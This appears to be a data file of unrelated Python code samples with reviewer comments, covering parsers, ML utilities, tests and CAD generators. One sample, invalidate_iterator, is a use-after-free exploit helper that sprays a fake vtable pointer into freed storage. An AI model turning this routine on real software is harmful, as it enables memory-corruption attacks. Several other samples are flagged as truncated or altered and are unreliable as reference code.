code stringlengths 281 23.7M |
|---|
def check_type_exc(pattern, obj, path=None):
    """Recursively check that *obj* matches the type *pattern*.

    Pattern forms:
      * list/tuple -- obj must be a list/tuple; ``(cls, ...)`` means every
        element matches ``cls``; otherwise an element-wise match of equal length.
      * dict -- obj must be a dict.  An optional ``...`` key selects the mode:
        '!' (default) all pattern keys must match, '?' only keys present in
        both, '=' key sets must be identical; alternatively ``...`` mapped in a
        one-entry dict gives a ``{key_type: value_type}`` match over all items.
      * function -- predicate that must return truthy for obj.
      * int/str/bytes/tuple instance -- obj must compare equal.
      * anything else -- used as a class for an isinstance() check.

    Raises CheckFailed on mismatch, accumulating the access path into
    ``e.path`` while unwinding; *path* is obj's key/index within its parent
    (None at the top level, which triggers ``e.finalize()``).
    """
    try:
        if isinstance(pattern, (list, tuple)):
            _check_isinstance(obj, (list, tuple))
            if ((len(pattern) == 2) and (pattern[(- 1)] is ...)):
                # (cls, ...): homogeneous sequence -- every element matches cls.
                cls = pattern[0]
                for (i, v) in enumerate(obj):
                    check_type_exc(cls, v, i)
            else:
                # Fixed-shape sequence: lengths must agree, then match pairwise.
                check((len(pattern) == len(obj)))
                for (i, (cls, v)) in enumerate(zip(pattern, obj)):
                    check_type_exc(cls, v, i)
        elif isinstance(pattern, dict):
            _check_isinstance(obj, dict)
            if (... in pattern):
                # Pop the mode marker from a copy so the caller's pattern
                # dict is not mutated.
                pattern = dict(pattern)
                match = pattern.pop(...)
            else:
                match = '!'  # default mode: all pattern keys required
            if (match in set('?!=')):
                lkeys = set(pattern.keys())
                rkeys = set(obj.keys())
                if (match == '!'):
                    iterkeys = lkeys
                elif (match == '?'):
                    iterkeys = (lkeys & rkeys)
                elif (match == '='):
                    check((lkeys == rkeys))
                    iterkeys = lkeys
                else:
                    assert False, 'WTF?!'
                for k in iterkeys:
                    # A missing key surfaces as a failed match against the
                    # _check_key_not_exists sentinel.
                    check_type_exc(pattern[k], obj.get(k, _check_key_not_exists), k)
            elif (match is ...):
                # {..., key_type: value_type}: uniform mapping match over
                # every key and value of obj.
                assert (len(pattern) == 1), 'Invalid dict pattern'
                (kt, vt) = list(pattern.items())[0]
                for k in obj:
                    check_type_exc(kt, k, ('<%s>' % kt.__name__))
                    check_type_exc(vt, obj[k], k)
            else:
                assert False, 'Invalid dict match type'
        elif issubclass(type(pattern), types.FunctionType):
            # Arbitrary predicate; any exception it raises is converted into
            # a CheckFailed chained to the original error.
            try:
                check(pattern(obj))
            except Exception as e:
                raise CheckFailed from e
        elif issubclass(type(pattern), (int, str, bytes, tuple)):
            # Literal value pattern: require equality.
            check((obj == pattern))
        else:
            # Anything else is treated as a class for isinstance().
            _check_isinstance(obj, pattern)
    except CheckFailed as e:
        # Build the access path bottom-up while the recursion unwinds.
        if (path is not None):
            e.path.insert(0, path)
        else:
            e.finalize()
        raise
class TrainingState(NamedTuple):
    """Immutable bundle of all learner state.

    Groups network parameters, their optimizer states, the target-network
    copy, the PRNG key and the update counter so the whole state can be
    passed through (and returned from) pure update functions.
    """
    policy_params: networks_lib.Params  # policy network weights
    policy_opt_state: optax.OptState  # optimizer state for the policy net
    value_params: networks_lib.Params  # value network weights
    value_opt_state: optax.OptState  # optimizer state for the value net
    critic_params: networks_lib.Params  # critic network weights
    critic_opt_state: optax.OptState  # optimizer state for the critic net
    target_critic_params: networks_lib.Params  # slow-moving copy of the critic
    key: types.PRNGKey  # PRNG key for stochastic operations
    steps: int  # number of learner updates performed so far
def invalidate_iterator(vtable):
    """Exploit helper: grow a db while an iterator is live so its backing
    storage is reallocated, then spray *vtable* over the freed region.

    Protocol details (send_command / send_getter / p64) are defined by the
    surrounding exploit script; this function only drives the sequence.
    """
    send_command('create test')
    send_command('create db')
    filler = 24       # number of small filler entries to seed the db
    all_killer = 512  # iterator window size / number of spray writes
    # Seed the db with entries of growing size.
    # NOTE: was `xrange`, which is Python-2-only and raises NameError on
    # Python 3; `range` behaves identically for this purpose on both.
    for i in range(filler):
        send_command(('store db string %s %s' % (str(i), ('A' * i))))
    # Open a getter (iterator) over the db, then force reallocation.
    send_command(('getter db %s %s' % (1, str(all_killer))))
    send_getter('empty')
    for i in range(1, all_killer):
        # Overwrite entry 1 repeatedly with the fake vtable pointer.
        send_getter(('store string 1 %s' % p64(vtable)))
        print(i, all_killer)
    send_command('print db')
def RdYlGn(range, **traits):
    """Return a ColorMapper built from a red/green/blue segment map.

    Each channel is a list of ``(x, y0, y1)`` control points in the
    Matplotlib segmented-colormap convention; *range* and any extra
    *traits* are forwarded to ``ColorMapper.from_segment_map``.

    NOTE(review): despite the RdYlGn name, nearly every control point is
    zero (only x=0.5 and red x=0.8 are non-zero), which renders mostly
    black -- this table looks truncated/corrupted relative to the standard
    RdYlGn map; verify against the original colormap data.
    """
    _data = dict(
        red=[(0.0, 0., 0.), (0.1, 0., 0.), (0.2, 0., 0.), (0.3, 0., 0.), (0.4, 0., 0.), (0.5, 1.0, 1.0), (0.6, 0., 0.), (0.7, 0., 0.), (0.8, 0.4, 0.4), (0.9, 0., 0.), (1.0, 0.0, 0.0)],
        green=[(0.0, 0.0, 0.0), (0.1, 0., 0.), (0.2, 0., 0.), (0.3, 0., 0.), (0.4, 0., 0.), (0.5, 1.0, 1.0), (0.6, 0., 0.), (0.7, 0., 0.), (0.8, 0., 0.), (0.9, 0., 0.), (1.0, 0., 0.)],
        blue=[(0.0, 0., 0.), (0.1, 0., 0.), (0.2, 0., 0.), (0.3, 0., 0.), (0.4, 0., 0.), (0.5, 0., 0.), (0.6, 0., 0.), (0.7, 0., 0.), (0.8, 0., 0.), (0.9, 0., 0.), (1.0, 0., 0.)],
    )
    return ColorMapper.from_segment_map(_data, range=range, **traits)
def test_lp_all_parameters():
    """get_or_create with every optional parameter: identical arguments must
    return the cached LaunchPlan object; a conflicting schedule must fail."""
    nt = typing.NamedTuple('OutputsBC', [('t1_int_output', int), ('c', str)])

    def t1(a: int) -> nt:
        a = a + 2
        return nt(a, 'world-' + str(a))

    def t2(a: str, b: str, c: str) -> str:
        return b + a + c

    def wf(a: int, c: str) -> str:
        x, y = t1(a=a)
        return t2(a=x, b=y, c=c)

    schedule = CronSchedule('* * ? * * *', kickoff_time_input_arg='abc')
    conflicting_schedule = CronSchedule('10 * ? * * *', kickoff_time_input_arg='abc')
    # All non-schedule parameters are shared between the three calls so the
    # cache-hit comparison sees identical objects.
    shared_kwargs = dict(
        workflow=wf,
        name='get_or_create',
        default_inputs={'a': 3},
        fixed_inputs={'c': '4'},
        notifications=[notification.Slack(
            phases=[_execution_model.WorkflowExecutionPhase.SUCCEEDED],
            recipients_email=['my-'])],
        auth_role=AuthRole(assumable_iam_role='my:iam:role'),
        labels=Labels({'label': 'foo'}),
        annotations=Annotations({'anno': 'bar'}),
        raw_output_data_config=RawOutputDataConfig('s3://foo/output'),
    )
    first = launch_plan.LaunchPlan.get_or_create(schedule=schedule, **shared_kwargs)
    second = launch_plan.LaunchPlan.get_or_create(schedule=schedule, **shared_kwargs)
    # Same name + same parameters -> the very same cached object.
    assert first is second
    # Same name but a different schedule -> rejected.
    with pytest.raises(AssertionError):
        launch_plan.LaunchPlan.get_or_create(schedule=conflicting_schedule, **shared_kwargs)
def train_val_split(df, n_val_samples: int, filter_out_unseen: bool=False) -> Tuple[(pd.DataFrame, pd.DataFrame)]:
    """Split *df* into (train, val) with a fixed random_state of 42.

    With ``filter_out_unseen`` the validation set is oversampled by 10%,
    rows whose products do not appear in train are dropped, the result is
    trimmed to ``n_val_samples``, and train becomes everything else.
    """
    if not filter_out_unseen:
        train, val = train_test_split(df, test_size=int(n_val_samples), random_state=42)
        logger.info('Train shape: {}, val shape: {}'.format(train.shape, val.shape))
        return train, val
    # Oversample val by 10% so we can afford to drop unseen-product rows.
    train, val = train_test_split(df, test_size=int(1.1 * n_val_samples), random_state=42)
    logger.info('Train shape: {}, val shape: {}'.format(train.shape, val.shape))
    seen_products = set(train['product1']).union(set(train['product2']))
    logger.info('No. of unique products in train: {:,}'.format(len(seen_products)))
    # Keep only val rows where both products were seen during training.
    val = val[val['product1'].isin(seen_products) & val['product2'].isin(seen_products)]
    logger.info('Updated val shape: {}'.format(val.shape))
    val = val.iloc[:n_val_samples].copy()
    logger.info('Final val shape: {}'.format(val.shape))
    # Train is everything not ending up in the final val set.
    train = df[~df.index.isin(set(val.index))].copy()
    logger.info('Final train shape: {}'.format(train.shape))
    return train, val
class Base_MATLAB_Language(Base_Language):
    """Common configuration shared by all supported MATLAB language versions.

    Concrete per-release subclasses (MATLAB_2017b_Language, 2020b, 2021a,
    Latest) refine the keyword/feature sets on top of this base.
    """
    def __init__(self, name):
        super().__init__(name)
        # MATLAB-specific lexing features layered over the generic base:
        # name/value-pair delegation token (.?), spmd blocks, function
        # argument blocks, and sub-functions inside classdef files.
        self.token_kinds.add('NVP_DELEGATE')
        self.tokens_with_implicit_value.add('NVP_DELEGATE')
        self.has_nvp_delegate = True
        self.keywords.add('spmd')
        self.function_contract_keywords.add('arguments')
        self.allow_classdef_subfunctions = True

    def parse_version(cls, version):
        """Parse 'latest' or a 'YEARa'/'YEARb' string into (major, minor).

        Returns ('latest', None) or (int_year, 'a'|'b'); raises ValueError
        for anything else.

        NOTE(review): takes ``cls`` -- presumably an @classmethod whose
        decorator was stripped in transit; confirm against the original.
        """
        if (version == 'latest'):
            return ('latest', None)
        else:
            match = re.match('^(20\\d\\d)([ab])$', version)
            if (match is None):
                raise ValueError('MATLAB version must be YEAR[ab], e.g. 2017b')
            (major, minor) = match.groups()
            return (int(major), minor)

    def get_version(cls, major, minor):
        """Map a parsed (major, minor) to a concrete language object.

        Supported range is 2017b .. 2022a inclusive; out-of-range versions
        raise ValueError.

        NOTE(review): also looks like a stripped @classmethod.
        """
        if (major == 'latest'):
            language = MATLAB_Latest_Language()
        elif ((major < 2017) or ((major == 2017) and (minor == 'a'))):
            raise ValueError('earliest MATLAB language supported is 2017b')
        elif ((major > 2022) or ((major == 2022) and (minor == 'b'))):
            raise ValueError('latest MATLAB language supported is 2022a')
        elif ((major < 2020) or ((major == 2020) and (minor == 'a'))):
            # 2017b .. 2020a share the 2017b feature set.
            language = MATLAB_2017b_Language()
        elif (major < 2021):
            # 2020b only.
            language = MATLAB_2020b_Language()
        else:
            # 2021a .. 2022a.
            language = MATLAB_2021a_Language()
        return language
def build(fips_dir, proj_dir, cfg_name, target=None, build_tool_args=None):
    """Fetch imports, generate and build every config matching *cfg_name*.

    Returns True when every loaded config built successfully, False (after
    logging) otherwise.
    """
    dep.fetch_imports(fips_dir, proj_dir)
    proj_name = util.get_project_name_from_dir(proj_dir)
    util.ensure_valid_project_dir(proj_dir)
    dep.gather_and_write_imports(fips_dir, proj_dir, cfg_name)
    configs = config.load(fips_dir, proj_dir, cfg_name)
    succeeded = 0
    if configs:
        for cfg in configs:
            valid, _ = config.check_config_valid(fips_dir, proj_dir, cfg, print_errors=True)
            if not valid:
                log.error("Config '{}' not valid in this environment".format(cfg['name']))
                continue
            log.colored(log.YELLOW, '=== building: {}'.format(cfg['name']))
            # Regenerate project files first; log (but do not abort) on failure.
            if not gen_project(fips_dir, proj_dir, cfg, False):
                log.error("Failed to generate '{}' of project '{}'".format(cfg['name'], proj_name))
            build_dir = util.get_build_dir(fips_dir, proj_name, cfg['name'])
            num_jobs = settings.get(proj_dir, 'jobs')
            built_ok = cmake.run_build(fips_dir, target, cfg['build_type'], build_dir, num_jobs, build_tool_args)
            if built_ok:
                succeeded += 1
            else:
                log.error("Failed to build config '{}' of project '{}'".format(cfg['name'], proj_name))
    else:
        log.error("No valid configs found for '{}'".format(cfg_name))
    if succeeded != len(configs):
        log.error('{} out of {} configs failed!'.format(len(configs) - succeeded, len(configs)))
        return False
    log.colored(log.GREEN, '{} configs built'.format(succeeded))
    return True
class PopularityBiasResult(MetricResult):
    """Result container for the popularity-bias metric.

    Stores the metric values computed on the current data plus, optionally,
    the same figures for a reference data set (the reference_* fields
    default to None when no reference is provided).
    """
    k: int  # top-k cutoff the metrics were computed over
    normalize_arp: bool  # whether ARP values were normalized
    # NOTE(review): field is spelled 'apr' while the flag says 'arp' --
    # presumably average recommendation popularity; confirm upstream.
    current_apr: float
    current_coverage: float  # coverage on the current data
    current_gini: float  # Gini index on the current data
    current_distr: Distribution  # full distribution for the current data
    reference_apr: Optional[float] = None
    reference_coverage: Optional[float] = None
    reference_gini: Optional[float] = None
    reference_distr: Optional[Distribution] = None
def main():
    """Demo: combine a key-padding mask with a subsequent (causal) mask and
    print both stages for inspection."""
    num_heads = 3
    # Two sequences of length 5; 1 = real token, 0 = padding.
    key_mask = torch.LongTensor([[1, 1, 1, 0, 0], [1, 1, 1, 1, 0]])
    batch, seq_len = key_mask.size()
    # Broadcast the padding mask to (batch, heads, seq, seq).
    pad_mask = key_mask.view(batch, 1, 1, seq_len).repeat(1, num_heads, seq_len, 1)
    print('### Only the padding masks ###')
    print(pad_mask)
    print(pad_mask.shape)
    # Intersect with the lower-triangular causal mask.
    causal = subsequent_mask(seq_len).view(1, 1, seq_len, seq_len).repeat(batch, num_heads, 1, 1)
    combined = torch.logical_and(pad_mask, causal).long()
    print('### With subsequent mask ###')
    print(combined)
    print(combined.shape)
class OptionSeriesArearangeSonificationContexttracksMappingTremoloSpeed(Options):
    """Config proxy for the Highcharts sonification tremolo ``speed`` mapping.

    NOTE(review): every option below is defined twice -- a getter form and a
    setter form with the same name.  These were almost certainly
    ``@property`` / ``@<name>.setter`` pairs whose decorators were stripped;
    as written, the second definition simply shadows the first at class
    creation time.  Restore the decorators from the original source before
    relying on this class.
    """
    def mapFunction(self):
        # Getter: configured value, or None when unset.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: store the raw value (not serialized as JS).
        self._config(value, js_type=False)

    def mapTo(self):
        # Getter for the data property the speed is mapped to.
        return self._config_get(None)

    def mapTo(self, text: str):
        # Setter for the mapped data property name.
        self._config(text, js_type=False)

    def max(self):
        # Getter for the mapping's upper bound.
        return self._config_get(None)

    def max(self, num: float):
        # Setter for the mapping's upper bound.
        self._config(num, js_type=False)

    def min(self):
        # Getter for the mapping's lower bound.
        return self._config_get(None)

    def min(self, num: float):
        # Setter for the mapping's lower bound.
        self._config(num, js_type=False)

    def within(self):
        # Getter for the 'within' grouping option.
        return self._config_get(None)

    def within(self, value: Any):
        # Setter for the 'within' grouping option.
        self._config(value, js_type=False)
class HalfBox(Boxes):
    """Half-open box with a diagonal brace: shelf, clamping jig, bookend."""

    description = 'This can be used to create:\n\n* a hanging shelf:\n\n\n* an angle clamping jig:\n\n\n* a bookend:\n\n\nand many more...\n\n'
    ui_group = 'Box'

    def __init__(self) -> None:
        Boxes.__init__(self)
        self.addSettingsArgs(edges.FingerJointSettings, finger=2.0, space=2.0)
        self.addSettingsArgs(edges.MountingSettings)
        self.buildArgParser(x=100, sy='50:50', h=100)
        # User-facing options controlling optional features.
        self.argparser.add_argument('--Clamping', action='store', type=boolarg, default=False, help='add clamping holes')
        self.argparser.add_argument('--ClampingSize', action='store', type=float, default=25.0, help='diameter of clamping holes')
        self.argparser.add_argument('--Mounting', action='store', type=boolarg, default=False, help='add mounting holes')
        self.argparser.add_argument('--Sturdy', action='store', type=boolarg, default=False, help='create sturdy construction (e.g. shelf, clamping jig, ...)')

    def polygonWallExt(self, borders, edge='f', turtle=False, callback=None, move=None):
        """Draw a polygon wall from a flat list of
        (length, next_angle, next_radius, next_edge) quadruples."""
        for i in range(0, len(borders), 4):
            self.cc(callback, i)
            length = borders[i]
            next_angle = borders[(i + 1)]
            next_radius = borders[(i + 2)]
            next_edge = borders[(i + 3)]
            # Resolve the edge character to an edge object (pass through
            # anything that is already an edge).
            e = self.edges.get(next_edge, next_edge)
            if (i == 0):
                # Leave room for the first edge's margin before drawing.
                self.moveTo(0, e.margin(), 0)
            e(length)
            if self.debug:
                self.hole(0, 0, 1, color=Color.ANNOTATIONS)
            self.corner(next_angle, tabs=0, radius=next_radius)

    def xHoles(self):
        # Finger holes for the intermediate supports along the bottom (x).
        posy = ((- 0.5) * self.thickness)
        for y in self.sy[:(- 1)]:
            posy += (y + self.thickness)
            self.fingerHolesAt(posy, 0, self.x)

    def hHoles(self):
        # Finger holes for the intermediate supports along the back (h);
        # iterates sy in reverse so holes line up with xHoles.
        posy = ((- 0.5) * self.thickness)
        for y in reversed(self.sy[1:]):
            posy += (y + self.thickness)
            self.fingerHolesAt(posy, 0, self.h)

    def render(self):
        """Render all parts: bottom, back wall and triangular supports
        (sturdy variant adds doubled edges and optional clamping holes)."""
        (x, h) = (self.x, self.h)
        d = self.ClampingSize
        t = self.thickness
        # Hypotenuse and the two angles of the x/h right triangle.
        l = math.sqrt(((x * x) + (h * h)))
        b = math.degrees(math.asin((x / l)))
        c = math.degrees(math.asin((h / l)))
        # NOTE(review): since b + c == 90 for a right triangle, 90+b+c is
        # always 180 and neither branch below can fire; presumably a guard
        # against degenerate inputs -- confirm intent against upstream.
        if (x > h):
            if (((90 + b) + c) < 179):
                b = (180 - b)
        elif (((90 + b) + c) < 179):
            c = (180 - c)
        # Offsets for the doubled (sturdy) outline.
        h1 = (((2 * t) / x) * h)
        l1 = (((2 * t) / x) * l)
        x2 = (((2 * t) / h) * x)
        l2 = (((2 * t) / h) * l)
        if self.Sturdy:
            width = (sum(self.sy) + ((len(self.sy) - 1) * t))
            self.rectangularWall(x, width, 'fffe', callback=[None, self.xHoles, None, None], move='right', label='bottom')
            self.rectangularWall(h, width, ('fGfF' if self.Mounting else 'fefF'), callback=[None, None, None, self.hHoles], move='up', label='back')
            self.rectangularWall(x, width, 'fffe', callback=[None, self.xHoles, None, None], move='left only', label='invisible')
            # Two outer side walls with the doubled outline.
            for i in range(2):
                self.move((((x + x2) + (2 * t)) + self.edges['f'].margin()), (((h + h1) + (2 * t)) + self.edges['f'].margin()), 'right', True, label=('side ' + str(i)))
                self.polygonWallExt(borders=[x2, 0, 0, 'e', x, 0, 0, 'h', (2 * t), 90, 0, 'e', (2 * t), 0, 0, 'e', h, 0, 0, 'h', h1, (180 - b), 0, 'e', ((l + l1) + l2), (180 - c), 0, 'e'])
                if self.Clamping:
                    self.hole(0, 0, 1, color=Color.ANNOTATIONS)
                    self.rectangularHole(((x / 2) + x2), ((2 * t) + (d / 2)), dx=d, dy=d, r=(d / 8))
                    self.rectangularHole(((((x + x2) + (2 * t)) - (2 * t)) - (d / 2)), ((h / 2) + (2 * t)), dx=d, dy=d, r=(d / 8))
                self.move((((x + x2) + (2 * t)) + self.edges['f'].margin()), (((h + h1) + (2 * t)) + self.edges['f'].margin()), 'right', False, label=('side ' + str(i)))
            # Inner triangular supports between the compartments.
            if (len(self.sy) > 1):
                for i in range((len(self.sy) - 1)):
                    self.move((x + self.edges['f'].margin()), (h + self.edges['f'].margin()), 'right', True, label=('support ' + str(i)))
                    self.polygonWallExt(borders=[x, 90, 0, 'f', h, (180 - b), 0, 'f', l, (180 - c), 0, 'e'])
                    if self.Clamping:
                        self.rectangularHole((x / 2), ((d / 2) - (t / 2)), dx=d, dy=(d + t), r=(d / 8))
                        self.rectangularHole(((x - (d / 2)) + (t / 2)), (h / 2), dx=(d + t), dy=d, r=(d / 8))
                    self.move((x + self.edges['f'].margin()), (h + self.edges['f'].margin()), 'right', False, label=('support ' + str(i)))
        else:
            # Light variant: fake zero-width outer compartments so the hole
            # callbacks also place supports at the outer edges.
            self.sy.insert(0, 0)
            self.sy.append(0)
            width = (sum(self.sy) + ((len(self.sy) - 1) * t))
            self.rectangularWall(x, width, 'efee', callback=[None, self.xHoles, None, None], move='right', label='bottom')
            self.rectangularWall(h, width, ('eGeF' if self.Mounting else 'eeeF'), callback=[None, None, None, self.hHoles], move='up', label='side')
            self.rectangularWall(x, width, 'efee', callback=[None, self.xHoles, None, None], move='left only', label='invisible')
            for i in range((len(self.sy) - 1)):
                self.move((x + self.edges['f'].margin()), (h + self.edges['f'].margin()), 'right', True, label=('support ' + str(i)))
                self.polygonWallExt(borders=[x, 90, 0, 'f', h, (180 - b), 0, 'f', l, (180 - c), 0, 'e'])
                if self.Clamping:
                    self.rectangularHole((x / 2), (d / 2), dx=d, dy=d, r=(d / 8))
                    self.rectangularHole((x - (d / 2)), (h / 2), dx=d, dy=d, r=(d / 8))
                self.move((x + self.edges['f'].margin()), (h + self.edges['f'].margin()), 'right', False, label=('support ' + str(i)))
class MATLAB_Lexer(Token_Generator):
    """Hand-written character-level lexer for MATLAB/Octave source.

    Emits m_ast.MATLAB_Token objects one at a time via token().  Handles the
    context-sensitive corners of the language: command form (``hold on``),
    string-vs-transpose disambiguation for ``'``, block comments, pragma
    annotations, and the insertion of anonymous commas inside matrix/cell
    literals where whitespace is significant.

    FIXES applied relative to the previous revision (literals had been
    corrupted): hex digit set was missing 0-9; the integer-suffix digit scan
    iterated over an empty string; the "at least one ... digit" message had
    a precedence bug that reduced it to 'hex'; and the '@' comparison for
    the AT token had degenerated to '' (never true, since cc is one char).
    """

    def __init__(self, language, mh, content, filename, blockname=None):
        super().__init__(language, filename, blockname)
        assert isinstance(content, str)
        self.text = content
        self.context_line = self.text.splitlines()
        self.mh = mh  # message handler used for errors and style checks
        # Character cursor: cc is the current character; nc/nnc/nnnc are
        # one/two/three characters of lookahead ('\x00' past end of input).
        self.lexpos = (- 1)
        self.col_offset = 0
        self.line = 1
        self.first_in_line = True
        self.first_in_statement = True
        self.bracket_stack = []  # currently open BRA/M_BRA/C_BRA tokens
        self.block_stack = []  # currently open classdef/function/... blocks
        self.add_comma = False  # emit an anonymous COMMA on the next call
        self.debug_comma = False
        self.in_lambda = False  # inside the parameter list of @(...)
        self.in_annotation = False  # inside a pragma (%|) line
        self.delay_list = []  # lookahead buffer used by token()
        self.command_mode = False  # lexing the tail of a command-form statement
        self.in_special_section = False  # inside properties/arguments/...
        self.process_pragmas = True
        self.block_comment = 0  # block-comment nesting depth
        self.cc = None
        self.nc = (self.text[0] if (len(self.text) > 0) else '\x00')
        self.nnc = (self.text[1] if (len(self.text) > 1) else '\x00')
        self.nnnc = (self.text[2] if (len(self.text) > 2) else '\x00')
        self.last_kind = None
        self.last_value = None

    def line_count(self):
        """Number of source lines."""
        return len(self.context_line)

    def correct_tabs(self, tabwidth):
        """Replace tabs with spaces (tab stops every *tabwidth* columns) and
        reset the cursor to the start of the corrected text."""
        assert (isinstance(tabwidth, int) and (tabwidth >= 2))
        new_lines = []
        for line in self.context_line:
            tmp = ''
            for c in line:
                if (c == '\t'):
                    # Pad to the next tab stop.
                    tmp += (' ' * (tabwidth - (len(tmp) % tabwidth)))
                else:
                    tmp += c
            new_lines.append(tmp)
        self.context_line = new_lines
        self.text = ('\n'.join(new_lines) + '\n')
        self.cc = None
        self.nc = (self.text[0] if (len(self.text) > 0) else '\x00')
        self.nnc = (self.text[1] if (len(self.text) > 1) else '\x00')

    def skip(self):
        """Advance the cursor by one character, maintaining lookahead and
        the column offset (reset at each newline)."""
        self.lexpos += 1
        if (self.cc == '\n'):
            self.col_offset = self.lexpos
        self.cc = self.nc
        self.nc = self.nnc
        self.nnc = self.nnnc
        self.nnnc = (self.text[(self.lexpos + 3)] if (len(self.text) > (self.lexpos + 3)) else '\x00')

    def advance(self, n):
        """Advance the cursor by *n* characters."""
        assert (isinstance(n, int) and (n >= 0))
        for _ in range(n):
            self.skip()

    def match_re(self, regex):
        """Match *regex* anchored at the current position; return the
        matched string or None."""
        match = re.match(('^' + regex), self.text[self.lexpos:])
        if (match is None):
            return None
        return match.group(0)

    def lex_error(self, message=None):
        """Report a lexing error at the current cursor position."""
        self.mh.lex_error(
            Location(filename=self.filename,
                     blockname=self.blockname,
                     line=self.line,
                     col_start=(self.lexpos - self.col_offset),
                     col_end=(self.lexpos - self.col_offset),
                     context=self.context_line[(self.line - 1)]),
            (message if message else ('unexpected character %s' % repr(self.cc))))

    def contains_block_open(self, string):
        """True if *string* contains a block-comment opener for any of the
        language's comment characters."""
        return any((((c + '{') in string) for c in self.language.comment_chars))

    def contains_block_close(self, string):
        """True if *string* contains a block-comment closer."""
        return any((((c + '}') in string) for c in self.language.comment_chars))

    def __token(self):
        """Produce the next raw token (None at end of input)."""
        # A pending anonymous comma (inserted inside matrix/cell literals
        # where whitespace separates elements) takes priority.
        if self.add_comma:
            self.add_comma = False
            fake_line = self.context_line[(self.line - 1)]
            fake_col = ((self.lexpos - self.col_offset) + 1)
            fake_line = ((fake_line[:fake_col] + '<anon,>') + fake_line[fake_col:])
            token = m_ast.MATLAB_Token(self.language, 'COMMA', ',',
                                       Location(filename=self.filename,
                                                blockname=self.blockname,
                                                line=self.line,
                                                col_start=fake_col,
                                                col_end=(fake_col + 6),
                                                context=fake_line),
                                       False, False,
                                       anonymous=True,
                                       annotation=self.in_annotation)
            self.last_kind = 'COMMA'
            self.last_value = ','
            return token
        # Skip whitespace (outside block comments) and remember if any was
        # present -- this matters for string/transpose disambiguation.
        preceeding_ws = False
        while (not self.block_comment):
            self.skip()
            if (self.cc in (' ', '\t')):
                preceeding_ws = True
            else:
                break
        if self.block_comment:
            self.skip()
        kind = None
        value = None
        t_start = self.lexpos
        col_start = (t_start - self.col_offset)
        contains_quotes = False
        if (self.cc == '\x00'):
            # End of input.
            return None
        elif self.block_comment:
            # Inside %{ ... %}: everything is COMMENT or NEWLINE.
            if (self.cc == '\n'):
                kind = 'NEWLINE'
            else:
                kind = 'COMMENT'
                while (self.nc not in ('\n', '\x00')):
                    self.skip()
        elif self.command_mode:
            # Command form: arguments are lexed as character arrays.
            if (self.cc in self.language.comment_chars):
                kind = 'COMMENT'
                while (self.nc not in ('\n', '\x00')):
                    self.skip()
            elif (self.cc == '\n'):
                kind = 'NEWLINE'
                while (self.nc in ('\n', ' ', '\t')):
                    self.skip()
            elif (self.cc == ';'):
                kind = 'SEMICOLON'
            elif (self.cc == ','):
                kind = 'COMMA'
            elif ((self.cc == '.') and (self.nc == '.') and (self.nnc == '.')):
                kind = 'CONTINUATION'
                while (self.cc not in ('\n', '\x00')):
                    self.skip()
            else:
                # One command-form argument, possibly containing quoted
                # sections and (balanced) brackets.
                kind = 'CARRAY'
                value = ''
                local_brackets = 0
                string_mode = False
                open_quote_location = None
                if (self.cc == "'"):
                    string_mode = True
                else:
                    value += self.cc
                while True:
                    if string_mode:
                        if ((self.nc == "'") and (self.nnc == "'")):
                            value += "'"  # escaped quote
                            self.skip()
                        elif (self.nc == "'"):
                            string_mode = False
                            open_quote_location = None
                        elif (self.nc in '\x00\n'):
                            self.mh.lex_error(open_quote_location,
                                              'this command form string is not terminated properly',
                                              fatal=False)
                            break
                        else:
                            value += self.nc
                    else:
                        if (self.cc in '({['):
                            local_brackets += 1
                        elif (self.cc in ')}]'):
                            local_brackets -= 1
                        if ((self.nc == '.') and (self.nnc == '.') and (self.nnnc == '.')):
                            break
                        elif (self.nc in self.language.comment_chars):
                            break
                        elif (self.nc in '\n\x00'):
                            break
                        elif ((local_brackets == 0) and (self.nc in ' \t,;')):
                            break
                        elif (self.nc == "'"):
                            string_mode = True
                            open_quote_location = Location(
                                filename=self.filename,
                                blockname=self.blockname,
                                line=self.line,
                                col_start=((self.lexpos + 1) - self.col_offset),
                                col_end=((self.lexpos + 1) - self.col_offset),
                                context=self.context_line[(self.line - 1)])
                        else:
                            value += self.nc
                    self.skip()
        elif ((self.cc in self.language.comment_chars) and (self.nc == '|') and self.first_in_line and self.process_pragmas):
            # Pragma annotation line (e.g. %| ...).
            self.in_annotation = True
            kind = 'ANNOTATION'
            self.skip()
        elif (self.cc in self.language.comment_chars):
            kind = 'COMMENT'
            while (self.nc not in ('\n', '\x00')):
                self.skip()
        elif (self.cc == '\n'):
            kind = 'NEWLINE'
            if self.in_annotation:
                # Annotations end at the newline; do not fold blank lines.
                pass
            else:
                while (self.nc in ('\n', ' ', '\t')):
                    self.skip()
        elif (self.cc == ';'):
            kind = 'SEMICOLON'
        elif ((not self.in_annotation) and (self.cc == '.') and (self.nc == '.')):
            self.skip()
            if (self.nc == '.'):
                # '...' continuation swallows the rest of the line.
                kind = 'CONTINUATION'
                self.skip()
                while (self.cc not in ('\n', '\x00')):
                    self.skip()
            else:
                self.lex_error('expected . to complete continuation token')
        elif (self.cc.isalpha() or (self.language.identifiers_starting_with_underscore and (self.cc == '_'))):
            kind = 'IDENTIFIER'
            while (self.nc.isalnum() or (self.nc == '_')):
                self.skip()
        elif ((self.cc == '0') and (self.nc in ('x', 'X', 'b', 'B')) and self.language.hex_literals):
            # Hex (0x..) or binary (0b..) integer literal, with an optional
            # signed/unsigned width suffix such as u8 or s32.
            kind = 'NUMBER'
            self.skip()
            if (self.cc in ('x', 'X')):
                # FIX: previously missing 0-9, which rejected every hex
                # literal containing a decimal digit.
                allowed_digits = '0123456789aAbBcCdDeEfF'
                bits_per_digit = 4
            else:
                allowed_digits = '01'
                bits_per_digit = 1
            digits = ''
            while (self.nc in allowed_digits):
                self.skip()
                digits += self.cc
            if (len(digits) == 0):
                # FIX: conditional now selects only the digit-kind word, not
                # the entire message.
                self.lex_error('at least one %s digit required'
                               % ('binary' if (bits_per_digit == 1) else 'hex'))
            if (self.nc in ('u', 'U', 's', 'S')):
                self.skip()
                suffix = ''
                # FIX: the digit set here had degenerated to the empty
                # string, so no suffix could ever be read.
                while (self.nc in '0123456789'):
                    self.skip()
                    suffix += self.cc
                if (suffix not in ('8', '16', '32', '64')):
                    self.lex_error('suffix must be 8, 16, 32, or 64')
                else:
                    max_digits = (int(suffix) // bits_per_digit)
            else:
                max_digits = (64 // bits_per_digit)
            if (len(digits) > max_digits):
                self.lex_error('too many digits for %u-bit %s literal'
                               % ((max_digits * bits_per_digit),
                                  ('binary' if (bits_per_digit == 1) else 'hex')))
